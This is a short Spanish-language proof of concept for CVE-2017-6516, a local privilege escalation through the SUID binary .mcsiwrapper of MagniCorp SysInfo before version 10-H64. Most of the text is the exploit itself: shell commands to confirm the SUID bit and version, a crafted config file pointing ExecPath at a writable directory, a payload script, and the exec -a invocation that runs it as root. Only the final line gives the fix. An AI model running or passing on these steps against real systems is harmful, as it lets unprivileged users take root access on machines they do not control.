
Un PoC / metodología para explotar CVE-2017-6516
CVE-2017-6516 es una vulnerabilidad de escalada de privilegios que apunta al binario .mcsiwrapper de MagniCorp SysInfo en versiones anteriores a la 10-H64. Cuando este binario tiene el bit SUID activado y está desactualizado, un usuario puede ejecutar código arbitrario como el propietario del binario, que suele ser root.
.mcsiwrapper debe tener setuid:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper debe estar por debajo de la versión 10-H64:$ .mcsiwrapper --version
<Version under 10-H64>
Crea un archivo config con el siguiente contenido:
ExecPath=<Path to a writeable directory>
Crea un archivo ejecutable de payload en el directorio ExecPath, por ejemplo:
#!/bin/sh
whoami
Y hazlo ejecutable:
$ chmod +x payload
Ejecuta el comando:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Actualiza .mcsiwrapper al menos a la versión 10-H64.